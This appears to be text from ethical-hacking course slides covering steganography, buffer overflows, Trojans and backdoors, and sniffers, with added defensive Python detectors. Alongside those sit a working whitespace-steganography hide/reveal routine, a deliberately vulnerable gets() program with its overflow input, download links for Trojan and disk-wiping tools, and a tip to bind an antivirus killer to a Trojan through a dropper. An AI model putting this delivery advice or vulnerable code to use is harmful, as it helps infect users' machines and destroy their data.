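written as eight trailing whitespace characters on one line (space = 0,
tab = 1). The carrier below is constructed.
"""
from typing import List, Tuple

CARRIER = "\n".join(f"line {i} of a perfectly ordinary memo" for i in range(1, 41))


def hide(carrier: str, message: str) -> str:
    """Append the UTF-8 bytes of `message` as trailing spaces/tabs, one per line."""
    payload = message.encode("utf-8")
    lines = carrier.split("\n")
    if len(payload) > len(lines):
        raise ValueError("carrier has too few lines for the message")
    out = []
    for i, line in enumerate(lines):
        if i < len(payload):
            bits = format(payload[i], "08b")
            line = line.rstrip() + "".join("\t" if b == "1" else " " for b in bits)
        out.append(line)
    return "\n".join(out)


def reveal(stego: str) -> str:
    """Read trailing whitespace back into bytes; stop at the first clean line."""
    data = bytearray()
    for line in stego.split("\n"):
        tail = line[len(line.rstrip(" \t")):]
        if len(tail) != 8:
            break
        data.append(int("".join("1" if c == "\t" else "0" for c in tail), 2))
    return data.decode("utf-8", "replace")


def trailing_whitespace_report(text: str) -> Tuple[int, int, List[int]]:
    """Defender's check on any text file.

    Returns (lines with trailing whitespace, total trailing whitespace
    bytes, line numbers whose trailing run mixes tabs and spaces). Mixed
    runs are the strongest hint: editors leave spaces or tabs, rarely both,
    and the byte total bounds how much could have been hidden.
    """
    flagged = 0
    total = 0
    mixed: List[int] = []
    for number, line in enumerate(text.split("\n"), start=1):
        tail = line[len(line.rstrip(" \t")):]
        if tail:
            flagged += 1
            total += len(tail)
            if " " in tail and "\t" in tail:
                mixed.append(number)
    return flagged, total, mixed


if __name__ == "__main__":
    stego = hide(CARRIER, "Swiss bank a/c: 3453434")
    print(reveal(stego))
    print(trailing_whitespace_report(CARRIER))
    print(trailing_whitespace_report(stego))
```

The report is the part worth keeping: a clean document scores (0, 0, []), while a file in which many consecutive lines end in mixed tabs and spaces is unusual for human-edited text. With snow's encryption enabled the content cannot be recovered, as the slide says, but the presence and size of a hidden payload are still visible to this check.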
Tool: Camera/Shy

© Camera/Shy works with Windows and Internet Explorer and lets users share censored or sensitive information buried within an ordinary GIF image.

© The program lets users encrypt text with a click of the mouse and bury the text in an image. The files can be password protected for further security.

© Viewers who open the pages with the Camera/Shy browser tool can then decrypt the embedded text on the fly by double-clicking on the image and supplying a password.
Steganography Detection

© Stegdetect is an automated tool for detecting steganographic content in images.

© It is capable of detecting different steganographic methods used to embed hidden information in JPEG images.

© Stegbreak is used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.
Tool: dskprobe.exe

© Windows 2000 Installation CD-ROM

© dskprobe.exe is a low level disk editor located in the Support Tools directory.

© Steps to read the EFS temp contents:

1. Launch dskprobe and open the physical drive to read.

2. Click the Set Active button adjacent to the drive after it populates the handle '0'.

3. Click Tools -> Search Sectors and search for the string efs0.tmp (in sector 0 at the end of the disk).

4. You should select Exhaustive Search, Ignore Case and Unicode characters.
Buffer Overflows

© A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with the extra overflowing and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source code:

© When the source is compiled and turned into a program and the program is run, it will assign a block of memory 32 bytes long to hold the name string.

    #include <stdio.h>

    int main(void)
    {
        char name[31];
        printf("Please type your name: ");
        gets(name);   /* no length check: input longer than the buffer overwrites adjacent memory */
        printf("Hello, %s\n", name);
        return 0;
    }

A buffer overflow will occur if you enter:

'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
Outlook Buffer Overflow

© There is a vulnerability in the Microsoft Outlook client. The attacker sends an e-mail with a malformed header that causes a buffer overflow to occur. It will:

1. Cause the victim's machine to crash, or

2. Cause arbitrary code to run on the victim's computer.

© Affects the following versions:

Microsoft Outlook versions 97/98 and 2000.

Microsoft Outlook Express 4.0, 4.01, 5.0 and 5.01
List of Buffer Overflow Cases

© Netmeeting 2.x exploit (http://www.cultdeadcow.com/cDc_files/cDc-35/)

© NT RAS Exploit (http://www.cerberus-infosec.co.uk/wprasbuf.html)

© IIS Hack (http://www.eeye.com)

© Oracle Web Exploit (http://www.cerberus-infosec.co.uk/advowl.html)

© Outlook Exploit (http://www.ussrback.com/labs50.html)

© IIS .printer (http://www.securityfocus.com/bid/2674)
Protection against Buffer Overflows

© Buffer overflow vulnerabilities are inherent in code due to poor or no error checking.

© General ways of protecting against buffer overflows:

1. Close the port or service

2. Apply the vendor's patch or install the latest version of the software

3. Filter specific traffic at the firewall

4. Test key applications

5. Run software at the least privilege required
Summary

© Hackers use a variety of means to penetrate systems.

© Password guessing / cracking is one of the first steps.

© Password sniffing is a preferred eavesdropping tactic.

© Vulnerability scanning aids the hacker in identifying which password cracking technique to use.

© Keystroke logging / other spyware tools are used as they gain entry to systems to keep up the attacks.

© Invariably, evidence of "having been there and done the damage" is eliminated by attackers.

© Stealing files as well as hiding files are means used to sneak out sensitive information.
Ethical Hacking

Module VI

Trojans and Backdoors
Module Objective

© Terms of reference for various malicious code

© Defining Trojans and backdoors

© Understanding the various backdoor genres

© Overview of various Trojan tools

© Learning effective prevention methods and countermeasures

© Overview of Anti-Trojan software

© Learning to generate a Trojan program
Trojans and Backdoors

A Trojan horse is:

© An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

© A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.

© Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
Working of Trojans

© The attacker gets access to the trojaned system as the system goes online.

© By way of the access provided by the trojan, the attacker can stage attacks of different types.
Various Trojan Genres

© Remote Access Trojans

© Password Sending Trojans

© Keyloggers

© Destructive

© Denial Of Service (DoS) Attack Trojans

© Proxy/Wingate Trojans

© FTP Trojans

© Software Detection Killers
Modes of Transmission

© ICQ

© IRC

© Attachments

© Physical Access

© Browser And E-mail Software Bugs

© NetBIOS (File Sharing)

© Fake Programs

© Un-trusted Sites And Freeware Software



Tool: QAZ

© It is a companion virus that can spread over the network.

© It also has a "backdoor" that will enable a remote user to connect to and control the computer using port 7597.

© It may have originally been sent out by email.

© Renames notepad to note.com

© Modifies the registry key: HKLM\software\Microsoft\Windows\CurrentVersion\Run
Hacking Tool: Tini

http://ntsecurity.nu/toolbox/tini

© It is a very tiny trojan program which is only 3 kb and programmed in assembly language. It takes minimal bandwidth to get on the victim's computer and takes small disk space.

© Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. The port number is fixed and cannot be customized. This makes it easier for a victim system to detect by scanning for port 7777.

© From a tini client you can telnet to the tini server at port 7777.
Tool: Netcat

[Screenshot: C:\WINNT\System32\cmd.exe - nc 210.212.219.76 80]

C:\Program Files\Tools\Netcat>nc 210.212.219.76 80
GET / HTTP

HTTP/1.1 200 OK
Date: Mon, 16 Jun 2003 06:21:22 GMT
Server: Apache/1.3.19 (Unix) (Red-Hat/Linux)
Last-Modified: Sun, 15 Jun 2003 11:34:01 GMT
ETag: "467d8-3619-3eec59a9"
Accept-Ranges: bytes
Content-Length: 13849
Connection: close
Content-Type: text/html

<html>

© Outbound or inbound connections, TCP or UDP, to or from any ports

© Ability to use any local source port

© Ability to use any locally-configured network source address

© Built-in port-scanning capabilities, with randomizer

© Built-in loose source-routing capability
Tool: Donald Dick

[Screenshot: Donald Dick 1.53 client with tabs File System / Registry / Processes / Windows / Keyboard / Miscellaneous / Passwords / System / Server / About, target 127.0.0.1, connection type SPX, Ping button]

• Donald Dick is a tool that enables a user to control another computer over a network.
• It uses a client-server architecture with the server residing on the victim's computer.
• The attacker uses the client to send commands through TCP or SPX to the victim listening on a predefined port.
• Donald Dick uses default port either 23476 or 23477.
Tool: SubSeven

[Screenshot: SubSeven client connected on port 27374; the "get pc info" function returned user name, Windows folder C:\WINDOWS, system folder C:\WINDOWS\SYSTEM, platform Windows Millennium Edition, resolution 1024x768 (16bpp), DirectX version, CPU GenuineIntel 897 MHz, disk size and free space, clients connected: 1; other functions listed: ip scanner, get home info, server options, ip notify, keys/messages, advanced, miscellaneous, fun manager, extra fun]

• SubSeven is a backdoor program that enables others to gain full access to Windows 9x systems through a network connection.
• The program consists of three different components: Client (SubSeven.exe), Server (Server.exe) and a Server configuration utility (EditServer.exe).
• The client is a GUI used to connect to the server through a network or internet connection.
Tool: Back Orifice 2000

[Screenshot: BO2K Configuration Wizard - Step 1. "Welcome to the BO2K Configuration Wizard! This wizard will help you install components into your BO2K server and configure them. First, you'll be asked to choose a BO2K server, then we'll walk you through the process of configuring the server with a new password. When you're done, your BO2K server will be ready for installation. Note that this wizard does not allow for full configuration flexibility. It is meant only to simplify the process of configuration." Checkbox: Show this wizard on startup. Next >>]

• Back Orifice accounts for the highest number of infestations on Microsoft computers.
• The BO2K server code is only 100 KB. The client program is 500 KB.
• Once installed on a victim PC or server machine, BO2K gives the attacker complete control of the system.
• BO2K has stealth capabilities: it will not show up on the task list and runs completely in hidden mode.



[Screenshot: cDc Back Orifice Win32 GUI Client, Target host:port 127.0.0.1]

Back Orifice Plug-ins

• BO2K functionality can be extended using BO plug-ins.
• BOPeep (complete remote control snap-in)
• Encryption (encrypts the data sent between the BO2K GUI and the server)
• BOSOCK32 (provides stealth capabilities by using ICMP instead of TCP/UDP)
• STCPIO (provides encrypted flow control between the GUI and the server, making the traffic more difficult to detect on the network)
Tool: NetBus

[Screenshot: NetBus 1.70 client, port 12345, status "No connection". Functions: Server admin, Open CD-ROM, Show image, Swap mouse, Start program, Msg manager, Screendump, Get info, Port redirect, Play sound, Exit Windows, Send text, Active wnds, App redirect, Mouse pos, Listen, Sound system, Server setup, Control mouse, Go to URL, Key manager, File manager; fields Host name/IP, Port, Add IP, Del IP, Memo, Connect, Scan, About]
Wrappers

• How does an attacker get BO2K or any trojan installed on the victim's computer? Answer: using wrappers.
• A wrapper attaches a given EXE application (such as a game or office application) to the BO2K executable.
• The two programs are wrapped together into a single file. When the user runs the wrapped EXE, it first installs BO2K and then runs the wrapped application.
• The user only sees the latter application.

One can send a birthday greeting which will install BO2K as the user watches a birthday cake dancing across the screen.
Hacking Tool: Silk Rope

http://www.h2ohackerz.co.uk/index2.htm

• Silk Rope is a wrapper program and has an easy-to-use user interface.
• Silk Rope binds the BO installer with a program of your choosing, saving the result as a single file.
• Presently, the icon is the generic single-file-install icon (an opening box with a window in the background); you can change it with an icon utility such as Microangelo.

[Screenshot: Silk Rope 2000 by BHan Enigm. "Welcome to Silk Rope 2000. To begin, click the wizard button at right. When complete, click the 'create' button below." Fields: Source Executable, Target Executable (infected.exe), BO Server, Target Date 08/30/2002]

Tool: EliteWrap

http://homepage.ntlworld.com/chawmp/elitewrap/

• EliteWrap is an advanced EXE wrapper for Windows 95/98/2K/NT used for SFX archiving and secretly installing and running programs.
• With EliteWrap one can create a setup program that would extract files to a directory and execute programs or batch files to display help, copy files, etc.
Tool: IconPlus

IconPlus can be used to change icons in EXE files.

[Screenshot: Icon Plus! (coded by The EkCor): Original File, Current Icon / Total Icons, Icon Files, checkboxes "Replace 32x32 icons" and "Replace 16x16 icons", Resulting File, Last Operation (Compression / Compilation)]
Tool: Restorator

[Screenshot: Restorator 2.50 resource editor browsing C:\Restorator\Testfiles: a tree of EXE and .res files with their Icon and Bitmap resources, a folder/file listing with sizes and dates, and a 404 x 204, 24-bit bitmap open in the viewer; status "61 open files"]
Packaging Tool: WordPad

[Screenshot: a WordPad document with Notepad.exe embedded as a "Scrap object", next to the Windows Folder Options > File Types > Edit File Type dialog for the Scrap object type (Content Type (MIME), Default Extension for Content Type, Actions: open, Enable Quick View, Confirm open after download)]
Infecting via CD-ROM

• When you place a CD in your CD-ROM drive, it automatically starts with some setup interface. An Autorun.inf file placed on such CDs is responsible for this action, and it looks like this:

  [autorun]
  open=setup.exe
  icon=setup.exe

• Therefore it is quite possible that while running the real setup program a trojan could be run very easily.
• Turn off the Auto-Start functionality by doing the following:
  Start button -> Settings -> Control Panel -> System -> Device Manager -> CDROM -> Properties -> Settings
Hacking Tool: Whack-A-Mole

• A popular delivery vehicle for NetBus/BO servers is a game called Whack-A-Mole, which is a single executable called whackamole.exe.
• Whack-A-Mole installs the NetBus/BO server and starts the program at every reboot.

[Screenshot: Whack-A-Mole game window with menu Game / Pause / About]

BoSniffer

• Soon after BO appeared, a category of cleaners emerged, claiming to be able to detect and remove BO.
• BoSniffer turned out to be one such Trojan that in reality installed Back Orifice under the pretext of detecting and removing it.
• Moreover, it would announce itself on the IRC channel #BO_OWNED with a random user name.
Hacking Tool: FireKiller 2000

• FireKiller 2000 will kill (if executed) any resident protection software.
• For instance, if you have Norton Anti-Virus auto scan in your taskbar and ATGuard Firewall activated, this program will KILL both on execution, and makes the installations of both UNUSABLE on the hard drive, which would require re-installation to restore.
• It works with all major protection software like AtGuard, Conseal, Norton Anti-Virus, McAfee Anti-Virus, etc.

Tip: Use it with an exe binder to bind it to a trojan before binding this file (trojan and FireKiller 2000) to some other dropper.
ICMP Tunneling

• Covert channels are methods by which an attacker can hide data in a protocol in a way that is undetectable.
• Covert channels rely on a technique called tunneling, which allows one protocol to be carried over another protocol.
• ICMP tunneling is a method of using ICMP echo-request and echo-reply as a carrier of any payload an attacker may wish to use, in an attempt to stealthily access or control a compromised system.
Hacking Tool: Loki

(www.phrack.com)

• Loki was written by daemon9 to provide shell access over ICMP, making it much more difficult to detect than TCP- or UDP-based backdoors.
• As far as the network is concerned, a series of ICMP packets are shot back and forth: ping, pong-response. As far as the attacker is concerned, commands can be typed into the loki client and executed on the server.
Loki Countermeasures

• Configure your firewall to block ICMP incoming and outgoing echo packets.
• Blocking ICMP will disable ping requests and may cause inconvenience to users.
• So you need to carefully decide on security vs. convenience.
• Loki also has the option to run over UDP port 53 (DNS queries and responses).



Reverse WWW Shell - Covert channels using HTTP

• Reverse WWW shell allows an attacker to access a machine on your internal network from the outside.
• The attacker must install a simple trojan program on a machine in your network, the Reverse WWW shell server.
• On a regular basis, usually every 60 seconds, the internal server will try to access the external master system to pick up commands.
• If the attacker has typed something into the master system, this command is retrieved and executed on the internal system.
• Reverse WWW shell uses the standard HTTP protocol.
• It looks like an internal agent is browsing the web.
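Because the agent uses plain HTTP, content inspection alone will not distinguish it from browsing; the fixed 60-second polling interval is what stands out in a proxy log. The following is an added example, not part of the course: it groups proxy log entries by client and destination host and flags pairs whose request spacing is nearly constant. The log lines are constructed, and the log format (epoch seconds, client, method, URL) is an assumption rather than any particular product's format.

```python
"""Look for the fixed-interval polling a Reverse WWW shell agent produces in a
web proxy log. Added example, not part of the course; the log lines below are
constructed, and the log format (epoch seconds, client, method, URL) is an
assumption, not a specific product's format."""
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed log: 10.0.0.5 polls 198.51.100.7 every ~60 s (the agent);
# 10.0.0.9 browses www.example.com at irregular intervals (a person).
SAMPLE_LOG = """
1055740800.0 10.0.0.5 GET http://198.51.100.7/cgi-bin/orderform
1055740805.0 10.0.0.9 GET http://www.example.com/
1055740811.0 10.0.0.9 GET http://www.example.com/news
1055740840.0 10.0.0.9 GET http://www.example.com/images/logo.gif
1055740843.0 10.0.0.9 GET http://www.example.com/about
1055740860.0 10.0.0.5 GET http://198.51.100.7/cgi-bin/orderform
1055740900.0 10.0.0.9 GET http://www.example.com/contact
1055740920.2 10.0.0.5 GET http://198.51.100.7/cgi-bin/orderform
1055740960.0 10.0.0.9 GET http://www.example.com/
1055740980.1 10.0.0.5 GET http://198.51.100.7/cgi-bin/orderform
1055741040.1 10.0.0.5 GET http://198.51.100.7/cgi-bin/orderform
1055741100.0 10.0.0.5 GET http://198.51.100.7/cgi-bin/orderform
"""

def parse_proxy_log(text):
    """Return (timestamp, client, destination host) tuples, skipping malformed lines."""
    events = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client, _method, url = parts[:4]
        host = urlsplit(url).hostname
        if host:
            events.append((float(ts), client, host))
    return events

def find_beacons(events, min_requests=5, max_cv=0.05):
    """Return {(client, host): mean_gap_seconds} for client/host pairs whose
    request spacing is nearly constant: coefficient of variation (standard
    deviation / mean of the gaps) at or below max_cv. Human browsing is bursty
    and scores far higher; a 60-second poll loop scores near zero."""
    stamps_by_pair = defaultdict(list)
    for ts, client, host in events:
        stamps_by_pair[(client, host)].append(ts)
    beacons = {}
    for pair, stamps in stamps_by_pair.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[pair] = round(avg, 1)
    return beacons

if __name__ == "__main__":
    for (client, host), gap in find_beacons(parse_proxy_log(SAMPLE_LOG)).items():
        print("%s -> %s polls every %.1f s" % (client, host, gap))
```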
Backdoor Countermeasures

• Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage (e.g. before accessing a floppy, running an exe or downloading mail).
• An inexpensive tool called Cleaner (http://www.moosoft.com/cleaner.html) can identify and eradicate 1000 types of backdoor programs and trojans.
• Educate your users not to install applications downloaded from the internet and e-mail attachments.
Tool: Fport

Screenshot: cmd.exe

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>fport -p
FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid   Process            Port  Proto Path
408   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
8     System         ->  139   TCP
632   MSTask         ->  1026  TCP   C:\WINNT\system32\MSTask.exe
408   svchost        ->  135   UDP   C:\WINNT\system32\svchost.exe
8     System         ->  137   UDP
8     System         ->  138   UDP
632   MSTask         ->  1963  UDP   C:\WINNT\system32\MSTask.exe
540   rtvscan        ->  2967  UDP   C:\Program Files\NavNT\rtvscan.exe
540   rtvscan        ->  4069  UDP   C:\Program Files\NavNT\rtvscan.exe

C:\>_
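A listing like the one above is only useful if someone reads it against what the trojans in this module are known to do. The following is an added example, not part of the course and not Foundstone's code: it parses fport-style output and flags processes bound to the default ports named on the preceding slides (QAZ, Tini, NetBus, Donald Dick, SubSeven) or carrying a system binary's name while running from outside the system directory. The listing it parses is constructed to mimic the output above and is not real system data.

```python
"""Audit an fport-style process-to-port listing for the default ports of the
trojans discussed in this module. Added example, not from the course and not
Foundstone's code; the listing below is constructed to mimic 'fport -p'
output and is not real system data."""
import re

# Default listening ports named on the preceding slides.
KNOWN_TROJAN_PORTS = {
    7597: "QAZ",
    7777: "Tini",
    12345: "NetBus",
    23476: "Donald Dick",
    23477: "Donald Dick",
    27374: "SubSeven",
}

# Process names a trojan commonly borrows; a genuine copy lives under system32.
SYSTEM_NAMES = {"svchost", "lsass", "services", "winlogon", "explorer"}

# One data row of fport output: Pid  Process  ->  Port  Proto  [Path]
ROW_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<process>\S+)\s+->\s+(?P<port>\d+)\s+"
    r"(?P<proto>TCP|UDP)\s*(?P<path>.*?)\s*$"
)

# Constructed sample listing (not real output): two suspicious rows are mixed in.
SAMPLE_FPORT = r"""
FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid   Process            Port  Proto Path
408   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
8     System         ->  139   TCP
632   MSTask         ->  1026  TCP   C:\WINNT\system32\MSTask.exe
1120  notepad        ->  7597  TCP   C:\WINNT\notepad.exe
1204  svchost        ->  27374 TCP   C:\WINNT\svchost.exe
540   rtvscan        ->  2967  UDP   C:\Program Files\NavNT\rtvscan.exe
"""

def parse_fport(text):
    """Return one dict per mapped port; banner and header lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append({
                "pid": int(m.group("pid")),
                "process": m.group("process"),
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "path": m.group("path"),
            })
    return rows

def find_suspects(rows, system_dir="c:\\winnt\\system32\\"):
    """Flag rows that listen on a known trojan port, or whose process borrows a
    system binary's name while its image is outside the system directory."""
    findings = []
    for r in rows:
        reasons = []
        if r["port"] in KNOWN_TROJAN_PORTS:
            reasons.append("default port of " + KNOWN_TROJAN_PORTS[r["port"]])
        path = r["path"].lower()
        if r["process"].lower() in SYSTEM_NAMES and path and not path.startswith(system_dir):
            reasons.append("system-named process running from " + r["path"])
        if reasons:
            findings.append((r["pid"], r["process"], r["port"], reasons))
    return findings

if __name__ == "__main__":
    for pid, proc, port, why in find_suspects(parse_fport(SAMPLE_FPORT)):
        print("PID %d %s port %d: %s" % (pid, proc, port, "; ".join(why)))
```

The port list is a starting point only, since most of these tools let the attacker change the port; the path check catches the case the port check misses.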
Tool: TCPView

[Screenshot: TCPView (Sysinternals, www.sysinternals.com) listing each process with its TCP and UDP endpoints, the local and remote addresses, and the connection state (LISTENING, ESTABLISHED, TIME_WAIT)]
Process Viewer

[Screenshot: Process Viewer showing the running processes (Acrobat.exe, Explorer.EXE, inetinfo.exe, PrcView.exe, rsvp.exe, ...), the threads of IEXPLORE.EXE with their IDs and priorities, the full path and version of each module, and the version information of EXPLORER.EXE (file version 6.00.2600.0000, company name Microsoft Corporation, description Windows Explorer, product name Microsoft Windows Operating System)]
Inzider - Tracks Processes and Ports

http://ntsecurity.nu/cgi-bin/download/inzider.exe.pl

• This is a very useful tool that lists the processes in your Windows system and the ports each one listens on.
• For instance, under Windows NT/2K, BO2K injects itself into other processes, so it is not visible in the Task Manager as a separate process.
• When you run Inzider, you will see the port BO2K has bound in its host process.
Senna Spy Generator

http://sennaspy.cjb.net/

• Senna Spy Generator 2.0 is a trojan generator. Senna Spy Generator is able to create Visual Basic source code for a trojan based on a few options.
• Because this trojan is compiled from generated source code, anything could be changed in it.

[Screenshot: generator options including Change wallpaper, Chat with server, Execute DOS commands, Find files, FTP server, Hang up Internet connection, Open/close CD-ROM, Play AVI or WAV, Reset windows, Send keys]


Hacking Tool: Hard Disk Killer (HDKP 4.0)

http://www.hackology.com/programs/hdkp/ginfo.shtml

• The Hard Drive Killer Pro series of programs offer one the ability to fully and permanently destroy all data on any given DOS or Win 3.x/9x/NT/2000 based system. In other words, 90% of the PCs worldwide.
• The program, once executed, will start eating up the hard drive, and/or infect and reboot the hard drive within a few seconds.
• After rebooting, all hard drives attached to the system would be formatted (in an unrecoverable manner) within only 1 to 2 seconds, regardless of the size of the hard drive.
System File Verification

• Windows 2000 introduced Windows File Protection (WFP), which protects system files that were installed by the Windows 2000 setup program from being overwritten.
• The hashes in this file could be compared with the SHA-1 hashes of the current system files to verify their integrity against the 'factory originals'.
• The sigverif.exe utility can perform this verification process.

[Screenshot: File Signature Verification dialog. "To help maintain the integrity of your system, critical files have been digitally signed so that any changes to these files can be quickly detected. Click Advanced to customize verification options. Click Start to check for any system files that are not digitally signed." Status: Scanning files... Buttons: Stop, Close, Advanced]
Tool: Tripwire

• Tripwire will automatically calculate cryptographic hashes of all key system files or any file that you want to monitor for modifications.
• Tripwire software works by creating a baseline "snapshot" of the system.
• It will periodically scan those files, recalculate the information, and see if any of the information has changed. If there is a change, an alarm is raised.
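The baseline-and-compare cycle described on the last two slides, as an added example that is not Tripwire's code and not part of the course. It builds a scratch directory of its own, records a hash, size and mode for every file into a JSON "snapshot", simulates a trojan patching a binary, dropping a file and deleting a log, and then reports the drift; SHA-256 is used here (the WFP catalog uses SHA-1), and the patched binary deliberately keeps its original size so that only the hash reveals the change.

```python
"""Baseline-and-compare file integrity check in the style of the Tripwire slide.
Added example, not Tripwire's code and not from the course; it builds a scratch
directory of its own, so the files and the changes are constructed. SHA-256 is
used here (the WFP catalog on the previous slide uses SHA-1)."""
import hashlib
import json
import os
import tempfile

def hash_file(path, algorithm="sha256"):
    """Stream the file through the hash so large binaries do not load into memory."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def snapshot(root):
    """Return {relative path: {hash, size, mode}} for every file under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = {"hash": hash_file(full), "size": st.st_size,
                         "mode": st.st_mode & 0o777}
    return snap

def compare(baseline, current):
    """Classify every path as added, removed or modified relative to the baseline.
    A file whose hash changed is reported even when size and mode are unchanged."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current)
                           if baseline[p] != current[p]),
    }

def demo():
    """Take a baseline, simulate a trojan's changes, and report the drift."""
    root = tempfile.mkdtemp(prefix="fim_root_")
    baseline_file = os.path.join(tempfile.mkdtemp(prefix="fim_db_"), "baseline.json")
    os.makedirs(os.path.join(root, "bin"))

    def write(rel, data):
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)

    write("a.txt", b"original log")
    write("bin/b.exe", b"MZ original image")
    with open(baseline_file, "w") as f:          # persist the "snapshot"
        json.dump(snapshot(root), f)

    write("bin/b.exe", b"MZ patched image!")      # same size, different content
    write("bin/c.exe", b"MZ dropped file")        # new file
    os.remove(os.path.join(root, "a.txt"))        # evidence removed

    with open(baseline_file) as f:
        baseline = json.load(f)
    return compare(baseline, snapshot(root))

if __name__ == "__main__":
    print(demo())
```

The baseline file must live somewhere the monitored host cannot rewrite (read-only media or another machine), otherwise a trojan with admin rights simply re-baselines after itself.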
Tool: Beast

• Beast is a powerful Remote Administration Tool (AKA trojan) built with Delphi 7.
• One of the distinct features of Beast is that it is an all-in-one trojan (client, server and server editor are stored in the same application).
• An important feature of the server is that it uses injecting technology.

[Screenshot: Beast client. Host 127.0.0.1, Port, Password, "Go BEAST!", Build Server, About, Help, Credits; tabs Managers / Windows / Fun Stuff with Files, Appz, Screen, Registry, Processes, WebCam, Get Log, Messages, Info, Passwordz, Clipboard; status "Disconnected"]
Summary

• Trojans are malicious pieces of code that carry cracker software to a target system.
• Trojans are used primarily to gain and retain access on the target system.
• Trojans often reside deep in the system and make registry changes that allow them to meet their purpose as a remote administration tool.
• Popular Trojans include Back Orifice, NetBus, SubSeven, Beast, etc.
• Awareness and preventive measures are the best defense against Trojans.
Ethical Hacking

Module VII
Sniffers

Module Objective

• Overview of Sniffers
• Understanding Sniffers from a cracker's perspective
• Comprehending Active and Passive Sniffing
• ARP Spoofing and Redirection
• DNS and IP Sniffing and Spoofing
• HTTPS Sniffing
• Illustration of various tools used in the above context
Sniffers - An Introduction

• Sniffers monitor network data.
• A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware programming.
• Sniffers usually act as network probes or "snoops" -- examining network traffic but not intercepting or altering it.
• Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels such as the Ethernet frame.
Security Concern

• Users of computer networks unwittingly disclose sensitive information about themselves through the use of insecure software and protocols.
• Standard implementations of widely adopted protocols such as Windows file sharing (CIFS/SMB), telnet, POP3, HTTP and FTP transmit login passwords in clear text, exposing an extremely large segment of the internet population to sniffing-related attacks.
Tool: Ethereal

[Screenshot: Ethereal capture window. Packet list (No., Time, Source, Destination, Protocol, Info): HTTP continuations between SVC002.bne344d.serer and ZAMEER, an SSDP "M-SEARCH * HTTP/1.1" from 192.168.2.28 to 192.168.2.1, two ICMP Destination unreachable messages, and TCP "1107 > http [ACK]" segments. Packet details for frame 2 (174 bytes on wire, 174 bytes captured): Ethernet II, Src 00:e0:4c:77:12:e7, Dst 00:a0:c5:4b:52:fc; Internet Protocol, Src Addr 192.168.2.28, Dst Addr 192.168.2.1; User Datagram Protocol, Src Port 3011, Dst Port 1900; Hypertext Transfer Protocol. The hex pane shows the SSDP request text: "M-SEARCH * HTTP/1.1", "HOST: 239.255.255.250:1900", "MAN: \"ssdp:discover\"", "MX: 3", "ST: urn:schemas-upnp-org:service:WANIPConnection:1". Filter / Reset / Apply; File: <capture> Drops: 0]
Tool: Snort

[Screenshot: IDScenter 1.1 RC2, main configuration. Toolbar: Start Snort, View alerts, Reset alarm, Test settings, Reload, Apply. Snort 1.9/1.8 or Snort 1.7; Snort executable file C:\IDS\snort.exe; options Show Snort console, Minimized Snort window, Don't restart Snort if it is killed; process priority Normal / High / Realtime; Snort service mode; autostart options (Start IDScenter with Windows, Start Snort when IDScenter is started); log folder and standard log file C:\Snort\log\alert.ids; log viewer: internal log viewer (standard log file or XML log file), Explorer URL (HTML file, ACID, SnortSnarf), or external viewer/editor for log files (WinSnort2HTML / ACID / SnortSnarf with another browser)]
• There are three main modes in which Snort can be configured: sniffer, packet logger, and network intrusion detection system.
• Sniffer mode simply reads the packets off of the network and displays them for you in a continuous stream on the console.
• Packet logger mode logs the packets to the disk.
• Network intrusion detection mode is the most complex and configurable configuration, allowing Snort to analyze network traffic for matches against a user-defined rule set.



Tool: WinDump

• WinDump is the port to the Windows platform of tcpdump, the most used network sniffer/analyzer for UNIX.

Screenshot: cmd.exe - windump -n -S -vv (the first lines are cut off at the left edge of the window)

C:\>windump -n -S -vv
windump: listening on \Device\NPF_{F036ABE8-53D7-4C7B-B2E4-082BEF4D72D8}
19:56:53.427131 IP (tos 0x88, ttl 106, id 58655, len 108) 68.193.110.230.5000 > 192.168.2.162.5000: udp 80
19:56:53.493683 IP (tos 0x88, ttl 106, id 58656, len 108) 68.193.110.230.5000 > 192.168.2.162.5000: udp 80
19:56:53.506094 IP (tos 0x88, ttl 43, id 46880, len 40) 64.4.26.250.80 > 192.168.2.69.2446: . [tcp sum ok] 894239202:894239202(0) ack 4229117801 win 17520
